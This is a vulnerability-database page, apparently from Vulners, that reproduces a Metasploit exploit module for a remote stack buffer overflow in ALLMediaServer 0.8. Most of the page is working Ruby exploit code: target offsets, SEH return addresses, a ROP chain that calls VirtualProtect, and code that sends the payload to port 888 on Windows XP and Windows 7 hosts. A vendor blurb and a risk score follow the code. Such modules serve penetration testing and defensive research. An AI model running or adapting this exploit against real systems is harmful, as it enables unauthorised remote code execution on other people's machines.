Vulners
Lucene search
ALLMediaServer 0.8 - Remote Buffer Overflow (Metasploit)
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'ALLMediaServer 0.8 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in ALLMediaServer 0.8.
The vulnerability is caused due to a boundary error within the
handling of HTTP request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'motaz reda <motazkhodair[at]gmail.com>', # Original discovery
'modpr0be <tom[at]spentera.com>', # Metasploit module
'juan vazquez' # More improvement
],
'References' =>
[
[ 'EDB', '19625' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process', #none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "",
'Space' => 660,
'DisableNops' => true
},
'Targets' =>
[
[ 'ALLMediaServer 0.8 / Windows XP SP3 - English',
{
'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
'OffsetRop' => 696,
'jmp' => 264,
'Offset' => 1072
}
],
[ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
{
'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
'OffsetRop' => 332,
'jmp' => 628,
'Offset' => 1072
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jul 04 2012',
'DefaultTarget' => 1))
register_options([Opt::RPORT(888)], self.class)
end
def junk(n=1)
return [rand_text_alpha(4).unpack("L")[0]] * n
end
def nops(rop=false, n=1)
return rop ? [0x665a0aa1] * n : [0x90909090] * n
end
def asm(code)
Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string
end
def exploit
#with help from mona :)
rop = [
nops(true, 12), #ROP NOP
0x65f6faa7, # POP EAX # RETN
0x671ee4e0, # ptr to &VirtualProtect()
0x6ac1ccb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN
0x667ceedf, # PUSH EAX # POP ESI # POP EDI # RETN
junk,
0x65f5f09d, # POP EBP # RETN
0x65f9830d, # & call esp
0x6ac1c1d5, # POP EBX # RETN
0x00000600, # 0x00000320-> ebx
0x6672a1e2, # POP EDX # RETN
0x00000040, # 0x00000040-> edx
0x665a09df, # POP ECX # RETN
0x6ad58a3d, # &Writable location
0x6ac7a771, # POP EDI # RETN
nops(true), # RETN (ROP NOP)
0x6682f9f4, # POP EAX # RETN
nops, # nop
0x663dcbd2 # PUSHAD # RETN
].flatten.pack("V*")
connect
buffer = rand_text(target['OffsetRop']) #junk
buffer << rop
buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload
buffer << rand_text(target['Offset'] - buffer.length)
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
print_status("Sending payload to ALLMediaServer on #{target.name}...")
sock.put(buffer)
disconnect
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jul 2012 00:00Current
7.4High risk
Vulners AI Score7.4